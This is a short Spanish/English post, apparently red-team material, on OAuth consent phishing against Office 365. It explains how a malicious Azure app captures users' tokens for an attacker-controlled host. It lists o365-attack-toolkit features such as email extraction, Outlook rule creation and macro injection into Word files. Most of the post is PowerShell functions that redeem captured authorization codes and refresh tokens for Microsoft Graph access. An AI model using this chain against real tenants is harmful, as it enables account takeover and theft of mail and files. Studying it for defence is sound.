Todos hemos visto las pantallas de dar permisos en android o iphone o facebook, pero que pasa si les dijera que lo mismo aplica para office 365?
Azure can create and register a new app that will basically function as a redirector of sorts that asks a targeted user to grant certain permissions as defined in the app, then ask for the user’s consent to those permissions and then finally takes the OAuth token generated by this process and forwards it along somewhere else. That somewhere else in this case is an attacker-controlled host.
Los pasos para crearla estan aquí https://www.lares.com/blog/malicious-azure-ad-application-registrations/
y en el curso de Breaching the cloud perimeter. Un mini OAuth servidor lo puedes ver aquí https://gist.github.com/invokethreatguy/c7480c04deda1a2d6ca0a4dc5b0fb016.
Y la documentación oficial de Microsoft aquí:
https://docs.microsoft.com/en-us/azure/active-directory/develop/scenario-web-app-call-api-overview
O365-attack-toolkit
Hay una forma semiautomática de hacerlo
o365-attack-toolkit allows operators to perform an OAuth phishing attack and later on use the Microsoft Graph API to extract interesting information.
Some of the implemented features are :
- Extraction of keyworded e-mails from Outlook.
- Creation of Outlook Rules.
- Extraction of files from OneDrive/Sharepoint.
- Injection of macros on Word documents.
Para trabajar con Powershell manual
## A few tools for working with Azure OAuth2 Authentication Codes and access_tokens
## By Beau Bullock @dafthack https://gist.github.com/dafthack/4a753e00ee946a0d967fcffa9fc1c526
Function Get-AzureAccessToken{
Param
(
[Parameter(Position = 0, Mandatory = $false)]
[string]
$Scope = "openid offline_access email user.read profile",
[Parameter(Position = 1, Mandatory = $true)]
[string]
$ClientID = "",
[Parameter(Position = 2, Mandatory = $true)]
[string]
$ClientSecret = "",
[Parameter(Position = 3, Mandatory = $true)]
[string]
$RedirectUri = "",
[Parameter(Position = 4, Mandatory = $true)]
[string]
$AuthCode = ""
)
$body = @{client_id=$ClientID
scope=$Scope
code=$AuthCode
redirect_uri=$RedirectUri
grant_type="authorization_code"
client_secret=$ClientSecret
}
$request = Invoke-WebRequest -Method POST -ContentType "application/x-www-form-urlencoded" -Uri "https://login.microsoftonline.com/common/oauth2/v2.0/token" -Body $body
$parsed = $request.Content | ConvertFrom-Json
Write-Output "---Here is your access token---"
$parsed.access_token
Write-Output "---Here is your refresh token---"
$parsed.refresh_token
}
Function Check-MSGraphAccess{
param(
[Parameter(Position = 0, Mandatory = $true)]
[string]
$access_token = ""
)
$request = Invoke-WebRequest -Method GET -Uri "https://graph.microsoft.com/v1.0/me" -Headers @{"Authorization" = "Bearer $access_token"}
$out = $request.Content | ConvertFrom-Json
$out
}
Function Get-NewAccessTokenWithRefreshToken{
Param
(
[Parameter(Position = 0, Mandatory = $false)]
[string]
$Scope = "openid offline_access email user.read profile",
[Parameter(Position = 1, Mandatory = $true)]
[string]
$ClientID = "",
[Parameter(Position = 2, Mandatory = $true)]
[string]
$ClientSecret = "",
[Parameter(Position = 3, Mandatory = $true)]
[string]
$RedirectUri = "",
[Parameter(Position = 4, Mandatory = $true)]
[string]
$RefreshToken = ""
)
$body = @{client_id=$ClientID
scope=$Scope
refresh_token=$RefreshToken
redirect_uri=$RedirectUri
grant_type="refresh_token"
client_secret=$ClientSecret
}
$request = Invoke-WebRequest -Method POST -ContentType "application/x-www-form-urlencoded" -Uri "https://login.microsoftonline.com/common/oauth2/v2.0/token" -Body $body
$parsed = $request.Content | ConvertFrom-Json
Write-Output "---Here is your access token---"
$parsed.access_token
Write-Output "---Here is your refresh token---"
$parsed.refresh_token
}
